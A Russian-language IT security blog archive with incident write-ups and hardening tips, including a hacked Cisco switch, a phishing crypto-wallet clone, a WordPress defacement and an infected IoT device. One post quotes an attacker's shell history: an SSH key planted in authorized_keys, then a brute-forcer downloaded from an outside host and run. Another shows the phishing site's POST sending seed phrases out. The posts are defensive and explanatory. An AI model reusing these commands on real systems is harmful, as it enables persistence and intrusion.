Записи с меткой «Security»

Заметка будет про китайское железо с бэкдорами и сетевую магию для нейтрализации подобной муйни.
(далее…)

Реклама

Стояла у нас на объекте камера — вот такой вот каркам. И в какой-то момент видеосервер перестал писать с неё данные. При этом IP-адрес есть, веб-морда открывается, но никакие пароли — ни наши, ни стандартные- не подходят. На самой камере снаружи никаких кнопок сброса не наблюдается.

Помня про пляски с хиквиженом, я решил прикола ради позвонить в поддержку. Оказалось, что эти крендели сброс пароля теперь классифицируют как «перепрошивка», стоит это 500 р. в их сервисе. На мои возражения, что прошивка там вполне жива, и слетели именно парольные настройки, а я хочу тупо восстановить доступ, мне начали заливать в уши ебанутую хуйню «типа про безопасность».

Мол, если у вас её спиздят, то злоумышленник может её использовать после сброса ! Я аж охуел, это прям фсб головного мозга какое-то.

На мой вопрос, что мешает злоумышленнику сбросить её за 500р. в их же сервисе или просто продать её на запчасти, и о какой вообще безопасности на объекте можно говорить, если там можно камеру просто безнаказанно отковырять, эти крендели мы ничего не ответили. А теперь собственно про безопасность, как её вижу я.

На это дивной камере открыта целая пачка портов:


PORT STATE SERVICE
80/tcp open http
407/tcp open timbuktu
443/tcp open https
554/tcp open rtsp
787/tcp open qsc
8000/tcp open http-alt

На порт 407 можно зайти телнетом и увидеть какой-то странный трейс прямо вот так сразу, без всякой авторизации:
[Trace]: AVStreamGetAVDataThread 581: gTransFormStatusFunc[8](1) == 0
[Trace]: AVStreamGetAVDataThread 581: gTransFormStatusFunc[8](2) == 0
[Trace]: AVStreamGetAVDataThread 725: Index = 0 Endflag == 255
[Trace]: AVStreamGetAVDataThread 727: VideoPos = 0
[Trace]: AVStreamGetAVDataThread 581: gTransFormStatusFunc[8](1) == 0
[Trace]: AVStreamGetAVDataThread 581: gTransFormStatusFunc[8](2) == 0
[Trace]: AVStreamGetAVDataThread 581: gTransFormStatusFunc[8](1) == 0
[Trace]: AVStreamGetAVDataThread 725: Index = 0 Endflag == 255
[Trace]: AVStreamGetAVDataThread 727: VideoPos = 0

Не удивлюсь, если и на порту 787 чего интересное найдется.

Прошивка тивоизирована, и сколько там прошито бэкдорных учеток — без реверсинга и не скажешь. Китайцы придумали классный наебизнес — убрать с прямой видимости кнопку резета, написать ебанутую на всю голову и априори уязвимую процедуру удаленного сброса настроек, после чего назвать это непотребство «безопасностью».

В случае с каркамом 2889 все оказалось проще — кнопка спрятана внутри герметичного корпуса. Так что откручиваем внешнее стопорное кольцо, извлекаем саму круглую камеру, и с помощью маленького ключа-шестигранника выкручиваем три винтика сзади. После снятия задней крышки видим кнопочку:

Internal reset button
for carcam 2889P


Выключаем питание, зажимаем кнопку, включаем питание (при зажатой кнопке!), держим 15 секунд, вуаля. И вот за вот это действо сервис хочет 500р , рассказывая тупые баечки про безопасность.

Так и только так — локальной кнопкой — должен быть реализован сброс настроек ! И никак иначе !
Любые «генераторы кодов сброса» при первой же утечке ключей или нахождении уязвимости откроют двери злоумышленникам к миллионам устройств, и даст рождение новым гигантским ботнетам.

Некоторые особо охуевшие конторки хотят скан паспорта. За сброс настроек, ага.

Запомните : вы не обязаны делиться своими перс-данными, тем более такими, как скан-паспорта, со всякими левыми говноконторами, не осилившими кнопку резет, чтобы восстановить доступ к своему же железу!

Кстати, российский закон о персональных данных и европейский GDPR прямо запрещают подобное.

Так что хакайте это сраное говножелезо как только можно, и в паблик, всё в паблик.

Заметочка 1 : прошивка сраное говно, веб-интерфейс работает только в ие после установки сторонних компонентов. Использовать веб-морду строго внутри виртуальной машины!

Заметочка 2 : Китайское железо откровенно бэкдорнутое, и может остукиваться китайцам. Размещайте камеры в изолированных вланах, не имеющих никакого выхода в интернеты. Доступ до своего ntp-сервера и сервера видеонаблюдения более чем достаточен.

Вечер пятницы пошел отлично. Вместо фитнеса после работы пришлось бороться с упавшей железкой.
Старая древняя циска-3750 пала жертвой неуловимых американских хакеров.

Один довольно свежий эксплоит «Бодрячок»:

https://pikabu.ru/story/uyazvimost_v_cisco_cve2018017_ili_klassicheskaya_pyatnitsa_5829430

, примерно 8 млн уязвимых девайсов и дурная мода циски на небезопасный по-умолчанию конфиг, в котором включено куча всего, плюс традиционная админская лень (сомнительный принцип «работает — не трогай») сделали своё дело.
Смотрю я в текущий конфиг — а там ни интерфейсов, ни ацл-ок, ни хрена.
загрузочный конфиг вообще порадовал:

Don’t mess with our elections…
~JHT
usafreedom_jht@tutanota.com

… и американский флаг в ASCII-графике.

На экране 200%-ое доказательство вмешательства американских спецслужб посредством эксплойта «Бодрячок». Срочно разбомбить Вашингтон. Выслать всех дипломатов. Попросить Путина больше не выбирать Трампа президентом США.

Пока я созерцал эту чудную аски-графику и со своего ноута переносил бэкап циско-конфига на tftp, в это время мне уже позвонил мой коллега, и сообщил, что ломают массово. Так что первым делом конфигурим минимальный сетевой интерфейс, пишем no vstack, и восстанавливаем конфиг из бэкапа, не забывал проверить злосчастную опцию. write memory, reload.
Чекать конфиг, обновлять фирмварь, выключать неиспользуемые технологии.

Всем хороших выходных, свежих прошивок и хороших конфигураций.

Всем привет ! Какое-то время назад я пообещал читателям, что обязательно поиграюсь с тулзой hashcat и поделюсь впечатлениями. С тех пор произошла одна очень интересная парольная утечка, показавшая, что даже очень длинные пароли могут быть не столь безопасны, как это кажется на первый взгляд. Итак, сегодня в нашей избе-читальне — утилита HashCat. Просим под кат.
(далее…)

Пользуясь любыми веб-системами, важно внимательно смотреть, КУДА вы зашли и ЧТО вы туда вводите.
Обычно мошенники создают фишинговые сайты для веб-морд всяких банков, с целью получить реквизиты банковских карт и пароли от банк-клиентов. Однако веб-морды есть не только у классического онлайн-банкинга, но и у криптовалютных кошельков. Криптовалюта — очень вкусная цель для злоумышленников, ведь в этом случае нет вообще никаких возможностей что-то себе вернуть при её утрате.

Например, есть такая криптовалюта, как эфириум. У эфириума очень тяжелый блокчейн, и полновесную ноду держать геморно. Поэтому существуют легковесные кошельки, которые не хранят весь блокчейн, а хрянят только кючи и заголовки необходимых блоков. Некоторые из них могут быть сделаны в виде веб-сайта.

Пример такого ресурса (нормального и валидного): https://www.myetherwallet.com/
На оригинальном сайте есть HTTPS c валидным сертификатом для компании MYETHERWALLET LLC и Extended Validation, адрес написан без ошибок, при создании нового кошелька нельзя создать кошелек с паролем меньше 9 символов, при развертывании напрямую из приватного ключа или из мнемонической фразы корректность данных проверяется локально с помощью джава-скрипта в браузере, без отправки каких-либо данных куда-либо. Кнопка Unlock становится доступной, только если данные введены полностью корректно.

Но если поискать фразу «myetherwallet» в яндексе с помощью браузера без баннерорезки, то сверху можно увидеть рекламу, ведущую на мошеннический сайт:
mwyetheerwalleet[.]com

У него нет HTTPS, адрес написан с ошибками (но малозаметными), пароли принимает любые, кнопка разбокировки становится доступной, если ввести любую строку. При нажатии кнопки Unlock данный фальшивый веб-кошелёк отправляет парольную фразу/приватный ключ на сервер 91.200.14.190 с помощью POST-запроса.
POST http:// mwyetheerwalleet .com/php/config.php
-----------------------------111222333
Content-Disposition: form-data; name="fselector1_send_ether_tokens"; filename=""
Content-Type: application/octet-stream

 

-----------------------------111222333
Content-Disposition: form-data; name="password"

 

-----------------------------111222333
Content-Disposition: form-data; name="textarea1_send_ether_tokens"

hui vam w anus a ne parolnaya fraza ot kefira
-----------------------------111222333
Content-Disposition: form-data; name="unlock2_send_ether_tokens"

 

-----------------------------111222333--

Оригинальный сайт никуда ваши ключи не отправляет, обрабатывая чувствительную инфу локально. Визуально же сайты ничем не отличаются.

Именно поэтому лучше использовать локально установленный платёжный софт, а если уж используете веб-системы (неважно, будет это криптовалютный кошелек или классический веб-банкинг) — то надо крайне внимательно проверять, что вы зашли именно куда хотели, а не к каким-то прохиндеям. Ну и нажать кнопочку «пожаловаться на мошенничество» благоразумным гражданам тоже не должно быть затруднительно.

Приветствую. Сегодня я хочу обратить внимание на одну парольную утечку — с3.14здили емейл-адреса и хэши пользовательских паролей из латино-американской социальной сети Taringa.

Что важно — поскольку вскрыты не все 100% паролей, а только ~94% — то хэширование явно имело место, пароли хотя бы не хранились plain-text, что до сих пор встречается.

Поражает не столько высокий процент вскрытия (это как раз норма, большинство пользователей не параноят), сколько наличие в списке вскрытых паролей очень большой длины — аж до 225 символов включительно. Понятное дело, что найдены они были не прямым перебором, а всякими гибридными атаками по связкам из словарей, масок и правил модификации. То есть современные техники брутфорсинга позволяют справиться с парольными фразами длиной за 200 символов. Предположу, что без HashCat64 и ферм с кучей видеокарт, временно снятых с майнинга, в такой вакханалии явно не обошлось.

Именно поэтому так важно использовать нетривиальные пароли, и особенно — никогда не использовать похожие, а тем более одинаковые пароли, на разных сервисах. Особенно важно уделять внимание паролям от банк-клиента, обменников, платёжных систем и подобного.

P.S. Я помню своё обещание рассказать про HashCat, но тулза эта настолько прекрасна и обширна по своим возможностям, что я только начал её относительно плотное изучение. Как найду чего интересное — поделюсь.

Всем привет. Технология DPI относится к инструментам двойного назначения, и может применяться как во благо (на домашнем роутере очень круто можно задетектить вредоносную активность или походы виндовс-ВМ по шпионским телеметрическим доменам), так и во зло (йопаная говноцензура).
Технология эта весьма сложна и затратна, а попытка реализовать её аналоги допотопно-пещерными методами легко приводит к былинным отказам.

К сожалению, из-за действий всяких упоротых политиков аббревиатура DPI стала часто ассоциироваться с сетевой цензурой, а вовсе не с умной приоретизацией траффика и детектом опасной сетевой активности.

Если вам интересно — вэлкам, постараюсь рассказать о том, как появились такие системы, какие бывают и что вообще там интересного.
(далее…)

Если ваш домашний роутер внезапно начал качать деццкое порно, призывать к беспорядкам или просто стал слать левый траффик, а в это время спецназ вам уже выпиливает дверь — не волнуйтесь, это лично Путен, под покровом ночи и прикрытием фсб, вас немного хакнул.
Хотя не, на этот раз не Путен.

На этот раз снова госдеп, а если точнее — коварные агенты ЦРУ.
викиликс как раньше аццки жгла, так и продолжает жечь сейчас.
Встречаем: http://nag.ru/news/newsline/31897/tsru-bolee-desyati-let-vzlamyivaet-domashnie-routeryi.html

В новой публикации рассказано об инструментарии под названием CherryBlossom, созданном специально для взлома домашних роутеров.

Благодаря CherryBlossom можно перехватывать управление над различными моделями роутеров. Заражение вредоносом может быть осуществлено как удаленно, так и сотрудником ЦРУ, работающим «в поле».

Список задач, которые может выполнять устройство, разнообразен. Заражённый роутер может сканировать локальную сеть жертвы, следить и контролировать трафик пользователя, перенаправлять его на необходимые ЦРУ сервисы. CherryBlossom может создать VPN-тоннель к сети жертвы, выполнять ещё ряд действий с URL, email и MAC-адресами.

В списке зараженных CherryBlossom устройств значатся более 200 моделей роутеров самых разных производителей:

Наивные хомячки домашние пользователи могут продолжать верить, что «они никому не нужны», им «нечего скрывать», а также продолжать не понимать ценность открытых/альтернативных прошивок.

То, о чём IT-специалисты предупреждали деятелей роскомпозора несколько лет назад, таки случилось. Полная ебанутость системы блокировок «запрещОнных сайтоФФ», полный ваккум в законодательстве по технической части и исключительная кривизна системы «ревизор» привели к тому, что опасающиеся неадекватно высоких штрафов (100к рублей за хуйню типа пары незаблоченных урлов) провайдеры по прямому указанию действующих властей заложили самую натуральную атомную бомбу под действующую сетевую инфраструктуру.

Немного поясню техническую часть. Реестр сайтов — это такая огроменная таблица примерно на 80 000 строчек, содержащаяся в полном беспределе и хаосе. Там есть и http-урлы, и https-урлы, есть домены, есть просто IP-адреса, есть списки адресов и прочее. Иногда ркн делает ошибки, добавляя неожиданные данные, типа конечной точки корневой зоны для одной записи из 80000, вставляя в поле «домен» значение IP-адреса и прочую вакханалию. Парсеры таким давятся, и попутно периодически что-либо ломают в провайдерской инфраструктуре, пока админ не найдет и не напишет очередную защитную обертку против такой херни.

При этом записи туда в основном только добавляются. Для выкидывания записи из списка либо владелец сайта должен выиграть судебную тяжбу (биткоиновцы, вы молодцы!), либо сам РКН может удалить относительно свежую запись, если посчитает, что ресурс таки пошёл им на уступки.

Но владельцы очень и очень многих заблоченных сайтов, особенно торгующих наркотой сайтов-однодневок, заблоченные домены просто забрасывали и регали всё новые и новые. За их разделегированием и выкидкой из реестра несуществующих в глобальном ДНС имён никто не следил — за это премий не дают.
В итоге в реестре скопились десятки тысяч записей о несуществующих доменах, для которых провайдеры по-прежнему осуществляют применение фильтрации.

А поскольку промышленный провайдерский DPI — игрушка зело дорогая, да и в законе по технической части весьма негусто (есть только один документ такого плана, и то рекомендательный), очень многие провайдеры делают не только DNS-, но и IP-блокировку, но до появления «ревизора» блокировка средствами днс в основном считалась достаточной (что вообщем-то так и есть — она достаточна для того, чтобы отшить 99% наркоманов от онлайн-покупки наркоты, а против остальных мало что поможет). Потом в реестре появились и IP-адреса — ушлые наркоторговцы просекли, что поднятый прямо на голом IP сайт, без доменного имени, тоже вполне ОК.

А потом появился «ревизор». Проблема этой кривой блядской коробочки (даже не сертифицированной как измерительное средство), что она не просто проверяет доступность сайтов «как есть», но и пытается делать прямые запросы по IP в обход провайдерского резолвинга, причём как по IP-адресам из реестра, так и по текущим IP из DNS. Естественно, с попутной выпиской «предписаний», руганью, штрафами и многомесячными судебными тяжбами.

В итоге провайдеры либо купили системы DPI, либо начали блочить любые полученные адреса, что из реестра (как изначально и было у тех, кто одним ДНС не ограничился), что из динамически обрабатываемого ДНС. Но в отличии от реестра, составляемого цензорами РКН и хоть как-то доступного для управления, в динамический ДНС изменения владелец домена вносит сам по своему желанию.

Bomb has been planted.

Таймер на бомбе тикал долго — аж несколько лет. За это время недовольство деятельностью РКН, давно вышедшей за всякие разумные рамки, достигло пред-критической величины (вообще идея отбирать у народа зрелища при отсутствии хлеба зело не здравая и мaйдaно-опасная). Предположу, что наезд на торрент-трекеры и анонимайзеры стал той последней каплей, после которой противостояние перешло в действительно активную фазу.

Прекрасно зная, что системы DPI стоят не у всех, а IP-блокировки весьма разрушительны, сетевые шутники массово начали заново регать те домены, которые были давно разделегированы регистраторами имён, но всё ещё оставались в блок-листах РКН, и в настройках DNS таких свежекупленных блоченных доменов прописывать IP-адреса враждебных или просто популярных ресурсов, чтобы даже самого ленивого хомячка хоть чуть-чуть, но зацепило.

Вышло классно — у ряда пользователей отвалился телеграм, онлайн-кинотеатр, новостные агентства и прочее и прочее.

Устроенная кибер-анархическая вакханалия вышла годной, и началось прописывание в заблоченные ДНС уже более важных адресов — служебных адресов самих систем РКН, банковских процессингов, и прочей мякотки.

Жутко обосравшись (и возможно даже получив серьёзный пропиздон от банкиров), ркн и даже один целый мвд начали нести полнейший бред, что сбои процессинга никак с днс-манипуляциями и кривыми блокировками не связаны, инфа типа ложная, а процессинг у сбербанка вообще самоубился без их участия, упав спиной на ножик 18 раз.

Tеrrоrists win.

Но самый прикол, что к участию в вакханалии присоединились даже дети.

Особый смак обнаружился, когда вспыла информация, что IP-блокировками занимались и транзитные операторы, из-за чего сбои многократно увеличили зону поражения.

Ркн в панике начал рассылать «белые списки» исключений, носящие, опять же, рекомендательный характер (в законе про такую муйню вообще ничего нет, как обычно), в попытках хоть как-то остудить оттраханную Сбербанком сраку (боюсь даже представить, какие претензии может вкатать Сбер за поблоченный карточный процессинг).

После этого читать тупые пафосные статьи про «доктрину информационной безопасности РФ», «цифровой суверинетет», «противодействие глобальным киберугрозам и кибершпионажу» — одновременно и грустно, и смешно.

Какое блять нахуй противостояние американской ИТ-разведке ?! Какие ещё нахуй доктрины безопасности ? РКН против вредоносных прошивок АНБ ? Яровая против закладок ЦРУ ?
Деревянные и некомпетентные в ИТ службы надзора в сфере связи против террористов из игил ?
Вы серьёзно ?!

Не смешите, нахрен, мои тапочки.

Уровень современного гос. управления ИТ в Роиссе — это повальные тупые блокировки, причём больше ради штрафов на ровном месте, чем ради реальной безопасности, и 14-летние восьмиклассники, простыми безобидными действиями ценой в 80 центов кладущие к хуям крупные банковские процессинги в масштабах страны руками самого ркн и самих же провайдеров.

Самое вкусное во всём этом — за такую «отаке» шутнику по закону даже предъявить ничего нельзя. Вообще.

Сайты регать можно ? Можно.
Запрещённого контента на сайте нет ? Нет.
Менять DNS на своём собственном домене можно ? Никаких проблем.

А что подложенная силами самого ркн бомба подорвала критически важную инфраструктуру (замечу, без всяких хакеров, хватило шутников из 8 класса) — вина исключительно самого ркн, и никого более. Профессионалы предупреждали.

Какая адская свистопляска может начаться в компьютерных системах РФ (до сих пор массово сидящих на старой винде) в случае реальной атаки силами АНБ или ЦРУ — можно пофантазировать самостоятельно. Думаю, что ванна-край и прочие безобидные конфикеры поблекнут весьма сильно.

P.S. И не надо пиздеть мне про Эльбрус — гос-органы файлы ODT до сих пор не научились принимать, просят ворд, причем 2003-й. Два компьютера на общем фоне погоды не делают.

Викиликс опубликовал классную и интересную документацию прямиком из ЦРУ:
https://wikileaks.org/vault7/#Pandemic

Если вам интересна тема современной шпиономании и технических возможностей американских разведок, приглашаем в избу-читальню.

(далее…)

А-а-а, пришельцы !!

Posted: 2017-04-22 in IT, Security
Метки:

Пришельцы из NSA, Equation Group и Shadow Brokers немного недосмотрели за своим инструментарием, и их боевое червие слегка разошлось по интернетам.

(далее…)

Начну с одной относительно малоизвестной цитаты.
«Вообще сама идея нажимать кнопки в том же самом месте, где должны появляться буквы (на экране) — нищебродна чуть более, чем полностью. На мой взгляд, совмещать устройство ввода и вывода — это как заваривать чай в унитазе.»

Это в качестве вступительной шутки.

(далее…)

WordPress JSON vuln

Posted: 2017-03-14 in Приколы, Security
Метки:

Обнаружил тут на одном ресурсе, запущенном на уязвимой версии вордпресс 4.7.1, следы нездоровой хакерской деятельности. Впрочем, красного фрибсд-шного чёрта на пол-страницы и рекламу казино на фоне разъехавшейся вёрстки сложно было не заметить 😀

Кислотные надписи типа «HaCkeD By BALA SNIPER», «HaCkEd By GeNErAL HaCkEr» и прочие следы дефейсеров-затейников вкупе с тоннами спамных ссылок тоже присутствовали. Почему-то многие владельцы сайтов не делают бэкапов, и потом начинают при такой мелкой оказии вручную херачить в базе и скриптах, тратя на это много сил, времени и нервов.

Но поскольку при любом взломе лучше всю ВМ считать скомпрометированной, то сперва изолируем контейнер с дефейснутым сайтом от основной сети:

Можно поставить просто другой свободный адрес, а можно и в отдельный влан утащить.
Потом запоминаем номер похеканной ВМ (в нашем случае 103), и ищем её бэкапы в хранилище RootBackups (НЕ во вкладке Backup самой ВМ, в этом случае мы восстановим бэкап поверх текущего контейнера):

И восстанавливаем бэкап под каким-нибудь новым номером. Запускаем, видим, что сайт работает, следов дефейса нет.
Дальше можно начать спокойно разбираться, что именно произошло, если это интересно.

Как оказалось, через багу в XML-JSON, найденную относительно давно/недавно, примерно месяц назад, злодейские скрипты записали в базу много мусора.
В логах это выглядит как пачка POST-запросов к /wp-json/… , время в которых будет точно совпадать со значением поля post_modified в оставленной дефейсером записи из таблицы wp_posts.
Если у вас тоже есть вордпресс — среди куч виртуалок может легко найтись редко вытаскиваемый на свет божий вордпресс не самой свежей версии, в котором могут обнаружиться следы чужого вмешательства. Яндекс по фразе «HaCkEd By GeNErAL HaCkEr» находит примерно 50 млн ответов, так что заброшек довольно много =)

После того на свежевосстановленной ВМ обновляем вордпресс, и если нам не нужны технические страницы, то прописываем в .htaccess (корень сайта) вот такое:

Redirect 403 /wp-json

# BEGIN WordPress
<IfModule mod_rewrite.c>
 ...
# END WordPress

<Files xmlrpc.php>
 Deny from all
</Files>

И смотрим, не осталось ли ещё где подобных заброшек со старыми версиями. И таки да, бэкапы рулят.

SHA-1 усё.

Posted: 2017-02-23 in Security
Метки:,

Новость на ЛОРе: https://www.linux.org.ru/news/security/13242997
Оригинал: https://shattered.it/

Корпорация добра провела практическую успешную атаку — получены два разных PDF с одинаковым SHA-1-хэшем:
$ sha1sum shattered-?.pdf
38762cf7f55934b34d179ae6a4c80cadccbb7f0a shattered-1.pdf
38762cf7f55934b34d179ae6a4c80cadccbb7f0a shattered-2.pd
f

Сравним их хекс-дампы:
$ hexdump shattered-1.pdf > shattered-1.hex
$ hexdump shattered-2.pdf > shattered-2.hex
$ kdiff3 shattered-1.hex shattered-2.hex

sha1_shattered diff screenshot

Огонь =)

Некоторое время назад я уже писал про устройства hikvision и их совершенно упоротую процедуру сброса пароля.

Сегодня же мы поговорим про устройства novicam, поскольку там они точно головой о Валуева приложились, и возможно, неоднократно.

(далее…)

Об исключительной благодатности использования криптографии я уже писал года три назад, и за это время многое успело измениться.

Шпионы по-прежнему шпионят, пользователи теряют ценные данные из-за вирусов, Сноуден и Ассанж также старательно избегают встреч с демократией, а монстро-государство решило вообще покуситься на запись всех петабайтов мусорного траффика, для чего даже обсудило возможность открыть свой ЖесткДискПром, который обошёл бы эти ваши сигейты с хитачами по объёмам выпускаемых накопителей.

И вот почитывая всякое интересное, наткнулся на такую любопытную заметку: http://www.leonidvolkov.ru/p/175/

Заметка оказалась настолько познавательной, что даже один известный оппозиционер её процитировал, и даже извинился, признав правоту параноиков.

Родина слышит. Картина Васи Ложкина

Что вообщем-то неудивительно, учитывая, что соратникам этого оппозиционера ломанули «суперзащищённый» телеграм, причём без использования суперкомпьютерных чудес криптоанализа, просто за счёт содействия сотового оператора. А ведь труЪ-параноики предупреждали, что сервис, опирающийся на изначально плохо защищенную телефонию, действительно надёжным не может быть по определению!

Но народ в массе своей по-прежнему тащится от смайликов, дизайна интерфейса и удобства синхронизации истории чата с центральных серверов на все устройства, что и даёт жизнь целым полчищам гумно-мессенджеров.

Не отключайтесь, удивительные истории ещё будут.

P.S. Данный пост оказался юбилейным — 500-м по счёту, в веб-морде админки есть ачивка =)

Настраивая или проверяя какой-либо драндулет на никсах (неважно, десктопного или серверного применения), полезно знать, нет ли в системе старого уязвимого софта мохнатых версий.

Нашел для этого совершенно изумительный сервис:

https://vulners.com/#audit

Суть проста : выбираем дистриб и версию, система покажет нам, какой командой получить список установленных пакетов с версиями.

Выполняем предложенное в терминале, вывод команды отправляем через веб-форму. Получаем либо сообщение, что для наших версий нет известных багов, либо детальный отчет с указанием пакета и описанием уязвимости в базе.

Огромный плюс — не требуется ставить никакой софт, запускать мутные сркипты и вообще пускать кого-либо в свои владения. Поддерживается дебиан, федора, центос, редхат и оракля. И убунта, куда же без неё.

Фряха не поддерживается (да, оно ещё вполне себе живо), увы.

Секурим Апач.

Posted: 2016-07-12 in IT, Networks, Security
Метки:

Цель заметки — свести воедино куски конфигов, которые необходимо поправить, чтобы получить топовые оценки на SSL Labs и High-Tect Bridge.

Важная заметка: всё это имеет смысл, только если стоят все секурити-фиксы, апач и пых топовые, лишние модули отключены, и прочее. Если у вас апач 2.2 с пыхом 5.3 на древней центоси — то вы ССЗБ или жертва грустных обстоятельств (говно-битрикс и прочее). Погнали.
(далее…)

Сегодня случилось забавное — было обнаружено, что одно из устройств климат-контроля и мониторинга системы кондиционирования стало генерить слишком много траффика на порту.
Данное устройство предназначено для слежения за температурой и состоянием кондиционеров, основано на каком-то микроконтроллере и использует проприетарную прошивку. Модель девайса даже не гуглится.

По требованиям заказчика оно было доступно извне без фильтрации по IP, пароли были вполне качественные.

Однако это ничуть не помешало зло-хакерам найти багу, взломать девайс и поставить внутрь небольшой http-проксик и бот для ssh-брутфорсинга сторонних серверов, что и было замечено.

Девайс, обычно генеривший 1-2 pps и считанные байты траффика, стал генерить 2-8 Kpps и 1-2 Mbit всякой трешни. Сделав дамп с помощью port-mirror и тестового ноута, обнаружил там кучу HTTP- и SSH- траффика, не имеющего никакого отношения к нашим сетям.

В итоге железку сперва переключил в карантин (влан без выхода в инет), и сделав снова дамп, обнаружил, что несчастная дрына упорно пытается зарезолвить адрес x.fd6fq54s6df541q23sdxfg.eu

На текущий момент оно резолвится вот в такие адреса:

$ nslookup x.fd6fq54s6df541q23sdxfg.eu 8.8.8.8
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: x.fd6fq54s6df541q23sdxfg.eu
Address: 147.252.1.254
Name: x.fd6fq54s6df541q23sdxfg.eu
Address: 83.143.80.227
Name: x.fd6fq54s6df541q23sdxfg.eu
Address: 202.103.224.85
Name: x.fd6fq54s6df541q23sdxfg.eu
Address: 211.103.199.98
Name: x.fd6fq54s6df541q23sdxfg.eu
Address: 78.10.50.1

Будьте бдительны, северо-корейские хакеры где-то рядом.

Наткнулся тут на вот такую заметку:

http://www.securitylab.ru/news/481604.php

То есть теперь если некий агентЪ из любой спецслужбы США хакает чьи-то системы в другой стране, хоть одиночно, хоть массово — то это не преступление, а «борьба с террористами/педофилами/отрицателями_локалхоста» и прочая «защита национальной безопасности США» в рамках расследования очередной покупки рюкзака и скороварки. Ну или агентЪ просто адресом ошибся, тоже бывает =)

Ссылка на оригинал : http://www.supremecourt.gov/orders/courtorders/frcr16_8mad.pdf

Ну а если какой Мэнинг или Сноуден о грязных делах проведает — то в самой демократичной тюрьме Гуантанамо всегда есть вакантные места для предателей интересов всемирной демократии.

Впрочем, это всё мои фантазии. На самом деле, никто конечно же за населением массово не следит, данные массово не собирает, системы типа Эшелона/СОРМ/Палантира/Призмы — они исключительно на террористов направлены, бэкдоров в виндовс-10 нету, а шифрованная связь в почте/IM обычным гражданам ну совершенно ни к чему, продолжайте в это верить. 😀 😀 😀

Протокол SSH, второй версии которого в этом году исполнилось 20 лет, воистину прекрасен.
Про SSH я уже писал в блоге несколько заметок.

За прошедшие 20 лет он стал стандартом де-факто для обеспечения удаленного доступа / переноса файлов максимально простым и весьма безопасным способом. Некоторые виды шифров успели за это время стать теоретически менее безопасными, и это отразилось на реализации.
(далее…)

Вирусы-шифровальщики никуда не делись. Шли годы, бэкапы никто так и не начал делать. Забавно, но до сих пор кто-то надеется на гарантии по расшифровке. Так вот — гарантий таких нет и не предвидится. Гарантия есть только одна — ваши резервные копии. В идеале — на DVD/BD болванках однократной записи.

Всё остальное гораздо менее надёжно.

Bruteforce-Bot

Posted: 2016-01-27 in IT, Security
Метки:, ,

Настраивая свою впс-ку, один клиент поставил слабый пароль на одну из учёток.

Что произошло дальше ?
Боты нащупали слабый пароль:
Accepted password for teamspeak from 185.56.80.177 port 60850 ssh2

зашли по SSH под логином teamspeak, и дальше сделали простую вещь:

$ cat /home/teamspeak/.bash_history

mkdir .ssh
cd .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAnhdLIoPB1q8Tn2LUsH7edJG7XwaJJ6cjmo3s+GRi\
ViLvNQIHl016+XIUVAL3Y/R5Irhxif88nymSBHgqBdmXtoNxNsdn6PBAPMH9Vx5XJ8Tc\
ELZQ9VW9Q4HfXptrP8Pm+LIya8pn6qhxtFnF3J5fGpfjnWhK3D439rq84l\
ygavU= Master IcS has arrived" >> authorized_keys
chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
passwd
php -v
sendmail
php -v
cd .ssh
ls
wget csmioveni.tripod.com//sshd.tgz
tar xvf sshd.tgz
cd .vmware-root/
ls
./start 213
ls

Обломившись с рутом и отсутствием php, херакеры решили немного с этой машины побрутить чужие сервера.

Пос0ны, налетай на csmioveni.tripod.com//sshd.tgz , к0чай прЕватные брутф0рсеры =)
В архиве оказался каталог .vmware-root, в нём — пара скомпиленных бинарей для брутфорса других серверов, словарик паролей и логинов.

Так что настраивая сервер, лучше сразу ставить нормальные пароли и делать авторизацию по ключам.

Проходя мимо чумного поселения, обнаружил нездоровое бурление и шум. Оказалось, что относительно недавно появившийся новый вирус-криптовальщик, дописывающий расширение .BREAKING_BAD, устроил настоящую бурю у хомячков на файловозках.

Предположу, что злодеи стали применять такую тактику — сперва (пока тушка не палится антивирями совсем) делаются целевые рассылки наиболее вкусным клиентам — бухгалтерам, менеджерам, директорам, технологам и прочему труЪ-ентерпрайзу с кучей ценных файлов и достаточным уровнем нищебродства, чтобы сэкономить на зарплате нормальному админу. Когда же тушка успеет несколько скиснуть, начнёт более-менее сносно палиться на вирус-тотале и потеряет свою исходную пробивную мощь — делается массовая рассылка всем остальным, у кого системы совсем уж непотребно дырявые. Конечно, 90-95% второй волны будет убито ещё на подлёте антиспамом/серверным кламавом/прочим, но и оставшихся жертв хватит — аудитория тут уже не целевая, бьют по площадям, в кого-нибудь да попадёт. И похоже, что попадает.

Хомяки, сильно офигевшие от такой «отаке», валом повалили на форумы аверов. Ну а поскольку понимания сути — ноль, форумы завалило потоком флуда типа «готов купить лицензию на антивирь, но только с ГАРАНТИЯМИ!!11! расшифровки на 100500%», «а давайте вы нахаляву и без смс сделайте супер-универсальный-мега-декриптор, сложно вам что ли», «почему антивирь 8-и летней давности не защитил мою Вин-ХП-СП2 с 6-м ИЕ, за_что_мы_деньги_платим ??!» и тому подобной смешной бредятины.

Видимо, сильно утомившись от общения с нищебродами, Паутинычи сделали ход конём:

Компания «Доктор Веб» сообщает об изменении условий предоставления бесплатных услуг технической поддержки пользователям Dr.Web, пострадавшим от действий троянцев-шифровальщиков семейства Trojan.Encoder. Теперь получить поддержку можно только обладая на момент заражения активной коммерческой лицензией Dr.Web, с установленным продуктом Dr.Web Security Space или Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite (версии 6+).

Решение спорное: всё-таки расшифровка похеренных шифровальщиками файлов — весомый аргумент выбрать продукт в будущем, пусть даже расшифровка возможна не всегда.

С другой стороны — шифрование становится всё крепче, вирусописатели учатся на своих ошибках, и у авера эта возня стала отнимать слишком уже много сил. Как я смог выцепить из форума Паутиныча — они раздобыли мощный вычислительный кластер (хз, построили, арендовали или получили доступ по благотворительности) и сократили время многих операций с недель и месяцев до нескольких часов. Также смогли найти весьма крутых спецов, способных делать криптоанализ и местами даже успешно. Насколько это круто ? Это неимоверно круто. Спецы по такому криптоанализу уникальны даже в масштабах мира, и каждый такой кадр (жуткий гибрид хакера-реверсера и узкоспециализированного математика-криптографа) реально на вес золота. Однако современное стойкое крипто не по зубам даже им, времени на анализ всё равно уходит масса, хомячки всё равно недовольны и грозятся «сменить антивирус и не купить лицензию». И даже случаи успешных расшифровок их не утешают и ничему не учат.

